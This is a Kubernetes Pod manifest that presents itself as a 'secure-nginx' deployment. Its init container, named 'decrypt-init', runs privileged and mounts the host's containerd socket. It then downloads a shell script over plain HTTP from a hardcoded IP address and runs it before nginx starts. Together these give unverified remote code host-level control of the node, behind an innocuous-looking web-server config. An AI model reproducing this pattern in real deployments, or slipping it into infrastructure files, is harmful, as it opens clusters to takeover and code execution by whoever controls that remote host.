apiVersion: v1
kind: Pod
metadata:
  name: secure-nginx
spec:
  restartPolicy: Always
  volumes:
    - name: containerd-sock
      hostPath:
        path: /run/containerd/containerd.sock
  initContainers:
    - name: decrypt-init
      image: localhost:5000/decrypt-init
      imagePullPolicy: Always
      securityContext:
        privileged: true
      command: ["/bin/bash", "-c"]
      args:
        - |
          echo "[*] Starting init container...";
          curl -o /tmp/decrypt.sh http://172.31.46.214:8080/decrypt.sh;
          chmod +x /tmp/decrypt.sh;
          /tmp/decrypt.sh;
      volumeMounts:
        - name: containerd-sock
          mountPath: /run/containerd/containerd.sock
  containers:
    - name: nginx
      image: docker.io/library/nginx:alpine                                                                                  
      imagePullPolicy: Never
      ports:
        - containerPort: 80


